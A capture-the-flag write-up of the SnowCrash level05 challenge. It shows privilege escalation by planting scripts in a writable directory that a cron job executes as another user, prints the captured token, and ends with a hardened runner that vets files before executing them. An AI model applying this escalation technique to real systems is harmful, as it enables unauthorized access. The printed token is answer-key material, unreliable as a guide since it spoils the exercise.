SnowCrash Mission: Flag05

Objective: Retrieve the Level06 token to advance further in the SnowCrash challenge.

Once logged in, the system shows us the following message: "You have new mail."

[~]$ ssh level05@10.12.177.116 -p 4242
	   _____                      _____               _
	  / ____|                    / ____|             | |
	 | (___  _ __   _____      _| |     _ __ __ _ ___| |__
	  \___ \| '_ \ / _ \ \ /\ / / |    | '__/ _` / __| '_ \
	  ____) | | | | (_) \ V  V /| |____| | | (_| \__ \ | | |
	 |_____/|_| |_|\___/ \_/\_/  \_____|_|  \__,_|___/_| |_|

  Good luck & Have fun

          10.12.177.116
level05@10.12.177.116's password:
You have new mail.

Next, we run the find command to look for files related to level05:

level05@SnowCrash:~$ find / -name level05 2>/dev/null
/var/mail/level05
/rofs/var/mail/level05
level05@SnowCrash:~$

We find /var/mail/level05, which indicates that a cron job is executing the script /usr/sbin/openarenaserver as the flag05 user:

level05@SnowCrash:~$ cat /var/mail/level05
*/2 * * * * su -c "sh /usr/sbin/openarenaserver" - flag05
level05@SnowCrash:~$

Looking at the source code of the script, it is obvious that it loops through all files in the /opt/openarenaserver folder and executes each of them with bash, as follows:

level05@SnowCrash:~$ cat /usr/sbin/openarenaserver
#!/bin/sh
 
for i in /opt/openarenaserver/* ; do
	(ulimit -t 5; bash -x "$i")
	rm -f "$i"
done
level05@SnowCrash:~$

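Now let's drop scripts into /opt/openarenaserver: one that runs whoami, to confirm which user executes them, and one that runs the getflag command and redirects its output to /opt/openarenaserver/flag. We wait 2 min and check for the /opt/openarenaserver/flag file.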

level05@SnowCrash:/opt/openarenaserver$ echo "whoami > /opt/openarenaserver/works" > cmd
level05@SnowCrash:/opt/openarenaserver$ ls
cmd
level05@SnowCrash:/opt/openarenaserver$ echo "getflag > /opt/openarenaserver/flag" > flash
level05@SnowCrash:/opt/openarenaserver$ ls
level05@SnowCrash:/opt/openarenaserver$ cat flag
Check flag.Here is your token : viuaaale9huek52boumoomioc
level05@SnowCrash:/opt/openarenaserver$ cat works
flag05
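
The level works because a job running as flag05 executes whatever it finds in a directory that level05 can write to. As an added example (not part of the original writeup or of the SnowCrash image), here is a runner that vets the directory and each file before executing anything; the function names are hypothetical and GNU stat is assumed.

```shell
#!/bin/sh
# Added example: vet a drop-in script directory before a privileged job runs it.
# Assumes GNU stat (Linux); all function names are hypothetical.

# Succeeds if TARGET is owned by uid OWNER and not group- or world-writable.
owned_and_locked() {
    target=$1 owner=$2
    info=$(stat -c '%u %a' -- "$target" 2>/dev/null) || return 1
    [ "${info%% *}" = "$owner" ] || return 1
    # %a is the octal mode; mask 022 covers the group-write and other-write bits.
    [ $(( 0${info##* } & 022 )) -eq 0 ]
}

# Prints the regular files in DIR that are owned by OWNER and locked down.
# Fails without output when the directory itself is writable by anyone else,
# because then any file in it could have been planted or swapped.
trusted_scripts() {
    dir=$1 owner=$2
    owned_and_locked "$dir" "$owner" || return 1
    for f in "$dir"/*; do
        [ -f "$f" ] && [ ! -L "$f" ] || continue   # skip symlinks, dirs, empty glob
        owned_and_locked "$f" "$owner" && printf '%s\n' "$f"
    done
    return 0
}

# Hardened form of the cron loop: run vetted files only, with the same CPU limit.
run_trusted() {
    trusted_scripts "$1" "$2" | while IFS= read -r script; do
        (ulimit -t 5; sh "$script")
    done
}
```

With the directory owned by flag05 and mode 755, the cron entry would call `run_trusted /opt/openarenaserver "$(id -u flag05)"`, and files dropped by any other user are never executed.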